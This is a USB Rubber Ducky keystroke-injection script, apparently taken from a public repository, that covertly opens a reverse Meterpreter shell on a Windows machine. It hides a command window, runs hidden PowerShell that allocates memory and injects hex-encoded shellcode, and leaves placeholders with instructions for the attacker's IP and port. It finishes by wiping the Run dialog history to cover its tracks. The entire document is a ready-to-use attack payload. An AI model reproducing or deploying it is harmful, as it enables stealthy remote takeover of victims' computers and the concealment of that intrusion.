REM Meterpreter Shell with USB Rubber Ducky https://github.com/mundungus443/malduino-scripts/blob/master/scripts/1111.txt
REM Original Payload by KernelEquinox
REM Converted by ThePlasmaRailgun (Finian Blackett)
REM Original payload and powershell scripting by KernelEquinox
REM Opens reverse meterpreter shell to specific IP and port
REM
REM
REM =-=-=-=-= IMPORTANT =-=-=-=-=
REM IP and port must be converted to hex and inserted into string
REM See later comments
REM
REM
DEFAULT_DELAY 100
DELAY 10000
GUI r
DELAY 1000
REM Start command line with small window and ultra dark text so it's hard to notice
STRING cmd.exe /T:01 /K mode CON: COLS=17 LINES=1
ENTER
DELAY 2500
REM Set powershell path variable
STRING if exist C:\Windows\SysWOW64 ( set PWRSHLXDD=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell) else ( set PWRSHLXDD=powershell )
ENTER
REM
REM Now we're gonna actually enter the shellcode... 
REM This is also the part where you need to enter the IP and port your meterpreter listener is waiting on.
REM
STRING %PWRSHLXDD% -nop -w hidden -c "$1 = '$c = ''[DllIm
STRING port(\"kernel32.dll\")]public static extern IntPtr
STRING  VirtualAlloc(IntPtr lpAddress, uint dwSize, uint 
STRING flAllocationType, uint flProtect);[DllImport(\"ker
STRING nel32.dll\")]public static extern IntPtr CreateThr
STRING ead(IntPtr lpThreadAttributes, uint dwStackSize, I
STRING ntPtr lpStartAddress, IntPtr lpParameter, uint dwC
STRING reationFlags, IntPtr lpThreadId);[DllImport(\"msvc
STRING rt.dll\")]public static extern IntPtr memset(IntPt
STRING r dest, uint src, uint count);'';$w = Add-Type -me
STRING mberDefinition $c -Name \"Win32\" -namespace Win32
STRING Functions -passthru;[Byte[]];[Byte[]]$sc = 0xfc,0x
STRING e8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x
STRING 64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x
STRING 8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0x
STRING c0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x
STRING 0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x
STRING 8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x
STRING 74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x
STRING 20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0x
STRING d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x
STRING c7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x
STRING 24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x
STRING 8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x
STRING 8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x
STRING 59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0x
STRING eb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x
STRING 73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0x
STRING d5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x
STRING 68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x
STRING 50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0x
STRING ff,0xd5,0x97,0x6a,0x05,0x68,
REM
REM ******************************IMPORTANT******************************
REM Replace the first four @ (at) symbols with your IP and port in hex!!!
REM *********************************************************************
REM
REM For example: 192.168.1.1 = 0xc0,0xa8,0x01,0x01
STRING 0x@@,0x@@,0x@@,0x@@,
REM
REM 
STRING 0x68,0x02,0x00,
REM
REM *******************IMPORTANT********************
REM Replace the second two with your port in hex!!!!
REM ************************************************
REM 
REM For example: port 4444 = 0x11,0x5c,
STRING 0x@@,0x@@,
REM 
REM 
STRING 0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,
STRING 0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,
STRING 0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,
STRING 0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,
STRING 0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,
STRING 0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,
STRING 0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,
STRING 0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,
STRING 0xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length 
STRING -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAllo
STRING c(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Lengt
STRING h-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), 
STRING $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;
STRING ;){Start-sleep 60};';$gq = [System.Convert]::ToBas
STRING e64String([System.Text.Encoding]::Unicode.GetBytes
STRING ($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemR
STRING oot + \"\\syswow64\\WindowsPowerShell\\v1.0\\power
STRING shell\";$cmd = \"-nop -noni -enc \";iex \" $x86 $c
STRING md $gq\"}else{$cmd = \"-nop -noni -enc\";iex \" po
STRING wershell $cmd $gq\";}"
REM
REM * * * * * * * * * * * *
REM *                     *
REM *  Take the red pill. *
REM *                     *
REM * * * * * * * * * * * *
REM
ENTER
REM
REM Clear our tracks
REM
GUI r
DELAY 1000
STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
